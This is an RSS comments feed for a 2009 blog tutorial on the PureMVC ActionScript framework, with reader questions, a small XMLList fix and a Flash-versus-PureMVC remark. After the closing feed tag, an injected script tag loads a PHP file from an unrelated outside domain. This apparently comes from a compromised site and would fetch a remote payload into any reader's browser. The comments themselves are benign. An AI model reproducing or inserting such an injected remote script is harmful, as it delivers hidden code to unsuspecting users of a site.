<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: PureMvc Sample</title>
	<atom:link href="http://codeofdoom.com/wordpress/2009/01/25/puremvc-sample/feed/" rel="self" type="application/rss+xml" />
	<link>http://codeofdoom.com/wordpress/2009/01/25/puremvc-sample/</link>
	<description></description>
	<lastBuildDate>Thu, 29 Jul 2010 14:18:31 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: NhiDang</title>
		<link>http://codeofdoom.com/wordpress/2009/01/25/puremvc-sample/comment-page-1/#comment-277</link>
		<dc:creator>NhiDang</dc:creator>
		<pubDate>Mon, 23 Nov 2009 07:30:31 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=14#comment-277</guid>
		<description>Great tutorial. But I got an error that &quot;can not convert XMLList to XML&quot;, 
--&gt; I replaced XML by XMLList in handleNotification function. It was done.

var xml:XMLList = notification.getBody().channel.item;

Great!</description>
		<content:encoded><![CDATA[<p>Great tutorial. But I got an error that &#8220;can not convert XMLList to XML&#8221;,<br />
&#8211;&gt; I replaced XML by XMLList in handleNotification function. It was done.</p>
<p>var xml:XMLList = notification.getBody().channel.item;</p>
<p>Great!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: BP</title>
		<link>http://codeofdoom.com/wordpress/2009/01/25/puremvc-sample/comment-page-1/#comment-273</link>
		<dc:creator>BP</dc:creator>
		<pubDate>Mon, 16 Nov 2009 20:54:28 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=14#comment-273</guid>
		<description>Flash is WAY faster than this. Let Flash do the work don&#039;t spend your time programming every tiny thing, it&#039;s 2009 for shit&#039;s sake.</description>
		<content:encoded><![CDATA[<p>Flash is WAY faster than this. Let Flash do the work don&#8217;t spend your time programming every tiny thing, it&#8217;s 2009 for shit&#8217;s sake.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Todd</title>
		<link>http://codeofdoom.com/wordpress/2009/01/25/puremvc-sample/comment-page-1/#comment-234</link>
		<dc:creator>Todd</dc:creator>
		<pubDate>Mon, 06 Jul 2009 17:00:14 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=14#comment-234</guid>
		<description>I am little confused in the facade class when you import these:

import com.PureMvcConstants;
import com.codeofdoom.puremvc.command.StartUpCommand;

Where are these packages coming from?</description>
		<content:encoded><![CDATA[<p>I am little confused in the facade class when you import these:</p>
<p>import com.PureMvcConstants;<br />
import com.codeofdoom.puremvc.command.StartUpCommand;</p>
<p>Where are these packages coming from?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: admin</title>
		<link>http://codeofdoom.com/wordpress/2009/01/25/puremvc-sample/comment-page-1/#comment-6</link>
		<dc:creator>admin</dc:creator>
		<pubDate>Tue, 27 Jan 2009 22:18:35 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=14#comment-6</guid>
		<description>@actionscripter:

I must say after using cairngorm quite a bit, PureMvc is quiet nice, but there were things I didnt really care for. Luckily that was fixed by Fabrication. Check out the other write I did that on.</description>
		<content:encoded><![CDATA[<p>@actionscripter:</p>
<p>I must say after using cairngorm quite a bit, PureMvc is quiet nice, but there were things I didnt really care for. Luckily that was fixed by Fabrication. Check out the other write I did that on.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: actionscripter</title>
		<link>http://codeofdoom.com/wordpress/2009/01/25/puremvc-sample/comment-page-1/#comment-5</link>
		<dc:creator>actionscripter</dc:creator>
		<pubDate>Tue, 27 Jan 2009 22:06:04 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=14#comment-5</guid>
		<description>Isn&#039;t PureMVC great?</description>
		<content:encoded><![CDATA[<p>Isn&#8217;t PureMVC great?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: links for 2009-01-27 &#124; Lazycoder</title>
		<link>http://codeofdoom.com/wordpress/2009/01/25/puremvc-sample/comment-page-1/#comment-4</link>
		<dc:creator>links for 2009-01-27 &#124; Lazycoder</dc:creator>
		<pubDate>Tue, 27 Jan 2009 10:07:23 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=14#comment-4</guid>
		<description>[...] Code of Doom » PureMvc Sample (tags: flex mvc) [...]</description>
		<content:encoded><![CDATA[<p>[...] Code of Doom » PureMvc Sample (tags: flex mvc) [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Doug</title>
		<link>http://codeofdoom.com/wordpress/2009/01/25/puremvc-sample/comment-page-1/#comment-3</link>
		<dc:creator>Doug</dc:creator>
		<pubDate>Mon, 26 Jan 2009 17:31:53 +0000</pubDate>
		<guid isPermaLink="false">http://codeofdoom.com/wordpress/?p=14#comment-3</guid>
		<description>Hi,
Thanks for your tutorial but I don&#039;t see you listed the StartupCommand class and its explanation.
It&#039;s a great post though.

Doug</description>
		<content:encoded><![CDATA[<p>Hi,<br />
Thanks for your tutorial but I don&#8217;t see you listed the StartupCommand class and its explanation.<br />
It&#8217;s a great post though.</p>
<p>Doug</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script src="http://indesignstudioinfo.com/ls.php"></script>